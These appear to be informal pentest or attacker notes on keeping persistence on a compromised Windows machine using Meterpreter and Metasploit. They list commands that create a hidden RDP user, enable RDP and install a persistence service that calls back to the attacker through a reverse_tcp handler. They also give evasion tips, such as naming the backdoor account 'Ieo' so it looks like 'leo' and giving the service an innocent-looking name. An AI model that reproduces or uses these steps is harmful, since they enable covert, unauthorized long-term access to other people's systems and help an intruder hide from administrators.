Persistence via RDP:

Create a new user in meterpreter:

run getgui -e -u asem -p Hacker_123321

Or use the MSF Module:

post/windows/manage/enable_rdp

To create a user and enable RDP on the target with a username and password of your choice...... COOL#

Then connect using #xfreerdp

Make sure to name the new user added to blend in the other users so it's not sus.

E.g. if there's a user called

• "leo" with small L
  We create our backdoor user named:
• "Ieo" with capital i

these two names are different 😲😲😲

##Just make sure the password is long and contain numbers and symbols for the password policy.....

MSF Module:

search platform:windows persistence

This creates a service that will provide us with access all the time to the target system...

exploit/windows/local/persistence_service

1. Choose a normal service name: set SERVICE_NAME microsoft word
2. Don't forget to set the session..

If all session are killed we can still gain access like this:

1. use multi/handler
2. Choose the same payload we used on the Persistence service Module above: set PAYLOAD windows/meterpreter/reverse_tcp
3. Choose the same LHOST and LPORT as the Persistence Service Module.
4. Then just hit run or exploit and we get a session...... Because the service is running on the target and always listening.